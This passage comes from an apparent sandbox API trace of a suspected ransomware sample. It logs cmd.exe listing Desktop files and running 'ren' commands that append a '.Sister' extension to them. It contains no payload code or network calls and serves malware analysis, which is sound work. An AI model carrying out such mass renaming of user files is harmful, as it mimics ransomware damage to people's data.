ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d6ccd0, cFileName="Users", cAlternateFileName="")) returned 0x21ed9a14520 [0202.656] FindClose (in: hFindFile=0x21ed9a14520 | out: hFindFile=0x21ed9a14520) returned 1 [0202.656] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d6ccd0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed9a14880 [0202.656] FindClose (in: hFindFile=0x21ed9a14880 | out: hFindFile=0x21ed9a14880) returned 1 [0202.656] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa3652155, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xa3652155, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d6ccd0, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed9a14e20 [0202.656] FindClose (in: hFindFile=0x21ed9a14e20 | out: hFindFile=0x21ed9a14e20) returned 1 [0202.656] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa3652155, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xa3652155, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d6ccd0, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0202.656] malloc (_Size=0x1ff9c) returned 0x21ed975fcb0 [0202.656] ??_V@YAXPEAX@Z () returned 0x21ed975fcb0 [0202.657] GetProcessHeap () returned 0x21ed8c70000 [0202.658] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67630 [0202.658] ??_V@YAXPEAX@Z () returned 0x1 [0202.658] ??_V@YAXPEAX@Z () returned 0x1 [0202.658] GetProcessHeap () returned 0x21ed8c70000 [0202.658] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9577fb0, Size=0x490) returned 0x21ed9577fb0 [0202.658] GetProcessHeap () returned 0x21ed8c70000 [0202.658] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9577fb0) returned 0x490 [0202.658] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0202.658] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.658] GetFileType (hFile=0x50) returned 0x2 [0202.658] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.658] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0202.659] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.659] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0202.664] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0202.664] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0202.664] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0202.664] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.664] GetFileType (hFile=0x50) returned 0x2 [0202.664] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.664] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0202.665] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.665] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0202.666] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.666] GetFileType (hFile=0x50) returned 0x2 [0202.666] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.666] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0202.666] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.666] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9577f80*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed9577f80*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0202.667] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0202.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.667] GetFileType (hFile=0x50) returned 0x2 [0202.667] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.667] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0202.667] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.667] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0202.675] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0202.675] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.675] GetFileType (hFile=0x50) returned 0x2 [0202.675] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.676] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0202.676] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.676] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0202.680] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0202.681] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0202.681] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0202.682] malloc (_Size=0xffce) returned 0x21ed973fd00 [0202.682] ??_V@YAXPEAX@Z () returned 0x21ed973fd00 [0202.682] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0202.682] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0202.682] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0202.682] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0202.682] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0202.682] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0202.682] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0202.682] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0202.682] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0202.682] ??_V@YAXPEAX@Z () returned 0x1 [0202.683] GetProcessHeap () returned 0x21ed8c70000 [0202.683] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d6d280 [0202.683] GetProcessHeap () returned 0x21ed8c70000 [0202.683] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6d280, Size=0x130) returned 0x21ed8d6d280 [0202.683] GetProcessHeap () returned 0x21ed8c70000 [0202.683] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6d280) returned 0x130 [0202.683] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.683] malloc (_Size=0xffce) returned 0x21ed973fd00 [0202.683] ??_V@YAXPEAX@Z () returned 0x21ed973fd00 [0202.683] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.683] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed973fd00, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0202.686] ??_V@YAXPEAX@Z () returned 0x1 [0202.686] GetProcessHeap () returned 0x21ed8c70000 [0202.686] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d6ba70 [0202.687] GetProcessHeap () returned 0x21ed8c70000 [0202.687] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d6d6b0 [0202.687] GetProcessHeap () returned 0x21ed8c70000 [0202.687] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6d6b0, Size=0x130) returned 0x21ed8d6d6b0 [0202.687] GetProcessHeap () returned 0x21ed8c70000 [0202.687] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6d6b0) returned 0x130 [0202.687] malloc (_Size=0xffce) returned 0x21ed973fd00 [0202.687] ??_V@YAXPEAX@Z () returned 0x21ed973fd00 [0202.687] GetProcessHeap () returned 0x21ed8c70000 [0202.687] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed9a14d00 [0202.687] GetProcessHeap () returned 0x21ed8c70000 [0202.687] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9574560 [0202.687] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0202.687] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0202.687] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0202.687] GetLastError () returned 0x2 [0202.687] GetProcessHeap () returned 0x21ed8c70000 [0202.687] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9a65f10 [0202.687] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9a65f20 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0202.688] SetErrorMode (uMode=0x0) returned 0x0 [0202.688] SetErrorMode (uMode=0x1) returned 0x0 [0202.688] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed973fd00, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0202.688] SetErrorMode (uMode=0x0) returned 0x1 [0202.688] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0202.688] GetProcessHeap () returned 0x21ed8c70000 [0202.688] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9576780 [0202.688] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0202.688] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0202.688] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0202.688] GetLastError () returned 0x2 [0202.688] ??_V@YAXPEAX@Z () returned 0x1 [0202.688] malloc (_Size=0xffce) returned 0x21ed973fd00 [0202.688] ??_V@YAXPEAX@Z () returned 0x21ed973fd00 [0202.688] malloc (_Size=0xffce) returned 0x21ed974fce0 [0202.688] ??_V@YAXPEAX@Z () returned 0x21ed974fce0 [0202.688] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0202.688] GetLastError () returned 0x2 [0202.689] _get_osfhandle (_FileHandle=2) returned 0x54 [0202.689] GetFileType (hFile=0x54) returned 0x2 [0202.689] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0202.689] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0202.689] _get_osfhandle (_FileHandle=2) returned 0x54 [0202.689] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0202.690] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.690] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.690] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0202.694] longjmp () [0202.694] ??_V@YAXPEAX@Z () returned 0x1 [0202.694] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25deb2e0, ftCreationTime.dwHighDateTime=0x1d5e56f, ftLastAccessTime.dwLowDateTime=0x18f51030, ftLastAccessTime.dwHighDateTime=0x1d5e8a1, ftLastWriteTime.dwLowDateTime=0x18f51030, ftLastWriteTime.dwHighDateTime=0x1d5e8a1, nFileSizeHigh=0x0, nFileSizeLow=0x11057, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="zfOV4.swf", cAlternateFileName="")) returned 1 [0202.694] GetProcessHeap () returned 0x21ed8c70000 [0202.694] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9a559e0, Size=0x54a) returned 0x21ed9a75f00 [0202.696] GetProcessHeap () returned 0x21ed8c70000 [0202.696] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9a75f00) returned 0x54a [0202.696] GetProcessHeap () returned 0x21ed8c70000 [0202.696] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9578450 [0202.696] GetProcessHeap () returned 0x21ed8c70000 [0202.696] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9578450, Size=0x30) returned 0x21ed9578450 [0202.696] GetProcessHeap () returned 0x21ed8c70000 [0202.696] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9578450) returned 0x30 [0202.696] GetProcessHeap () returned 0x21ed8c70000 [0202.696] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9578490 [0202.696] malloc (_Size=0x1ff9c) returned 0x21ed975fcc0 [0202.697] GetProcessHeap () returned 0x21ed8c70000 [0202.697] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x24) returned 0x21ed8d45e60 [0202.697] ??_V@YAXPEAX@Z () returned 0x1 [0202.697] GetProcessHeap () returned 0x21ed8c70000 [0202.697] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9578490, Size=0x110) returned 0x21ed9578490 [0202.698] GetProcessHeap () returned 0x21ed8c70000 [0202.698] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9578490) returned 0x110 [0202.698] GetProcessHeap () returned 0x21ed8c70000 [0202.698] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed95785b0 [0202.698] GetProcessHeap () returned 0x21ed8c70000 [0202.698] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed95785b0, Size=0x290) returned 0x21ed95785b0 [0202.698] GetProcessHeap () returned 0x21ed8c70000 [0202.698] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed95785b0) returned 0x290 [0202.698] GetProcessHeap () returned 0x21ed8c70000 [0202.698] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9578850 [0202.698] GetProcessHeap () returned 0x21ed8c70000 [0202.698] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9578850, Size=0x30) returned 0x21ed9578850 [0202.698] GetProcessHeap () returned 0x21ed8c70000 [0202.698] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9578850) returned 0x30 [0202.698] GetProcessHeap () returned 0x21ed8c70000 [0202.698] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9578890 [0202.698] malloc (_Size=0x1ff9c) returned 0x21ed975fcc0 [0202.698] GetProcessHeap () returned 0x21ed8c70000 [0202.698] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x24) returned 0x21ed8d45d70 [0202.698] ??_V@YAXPEAX@Z () returned 0x1 [0202.698] malloc (_Size=0x1ff9c) returned 0x21ed975fcc0 [0202.698] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Users", cAlternateFileName="")) returned 0x21ed9a142e0 [0202.698] FindClose (in: hFindFile=0x21ed9a142e0 | out: hFindFile=0x21ed9a142e0) returned 1 [0202.699] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed9a14c40 [0202.699] FindClose (in: hFindFile=0x21ed9a14c40 | out: hFindFile=0x21ed9a14c40) returned 1 [0202.699] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa3652155, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xa3652155, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed9a140a0 [0202.699] FindClose (in: hFindFile=0x21ed9a140a0 | out: hFindFile=0x21ed9a140a0) returned 1 [0202.699] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\zfOV4.swf", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25deb2e0, ftCreationTime.dwHighDateTime=0x1d5e56f, ftLastAccessTime.dwLowDateTime=0x18f51030, ftLastAccessTime.dwHighDateTime=0x1d5e8a1, ftLastWriteTime.dwLowDateTime=0x18f51030, ftLastWriteTime.dwHighDateTime=0x1d5e8a1, nFileSizeHigh=0x0, nFileSizeLow=0x11057, dwReserved0=0x4, dwReserved1=0x80, cFileName="zfOV4.swf", cAlternateFileName="")) returned 0x21ed9a14220 [0202.699] FindClose (in: hFindFile=0x21ed9a14220 | out: hFindFile=0x21ed9a14220) returned 1 [0202.699] malloc (_Size=0x1ff9c) returned 0x21ed977fc70 [0202.700] ??_V@YAXPEAX@Z () returned 0x21ed977fc70 [0202.701] GetProcessHeap () returned 0x21ed8c70000 [0202.701] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1c) returned 0x21ed8d45b30 [0202.701] ??_V@YAXPEAX@Z () returned 0x1 [0202.701] ??_V@YAXPEAX@Z () returned 0x1 [0202.701] GetProcessHeap () returned 0x21ed8c70000 [0202.701] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9578890, Size=0x110) returned 0x21ed9578890 [0202.701] GetProcessHeap () returned 0x21ed8c70000 [0202.701] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9578890) returned 0x110 [0202.701] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0202.701] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.701] GetFileType (hFile=0x50) returned 0x2 [0202.701] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.701] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0202.702] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.702] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0202.708] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0202.708] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0202.709] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0202.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.709] GetFileType (hFile=0x50) returned 0x2 [0202.709] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.709] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0202.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.709] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0202.709] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.709] GetFileType (hFile=0x50) returned 0x2 [0202.710] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.710] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0202.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.710] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9578460*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9578460*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0202.710] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"zfOV4.swf\" \"zfOV4.swf.Sister\" ") returned 32 [0202.710] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.710] GetFileType (hFile=0x50) returned 0x2 [0202.710] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.710] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0202.711] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.711] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x20) returned 1 [0202.711] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0202.711] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.711] GetFileType (hFile=0x50) returned 0x2 [0202.711] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0202.711] GetConsoleMode (in: hConsoleHandle=0x50, 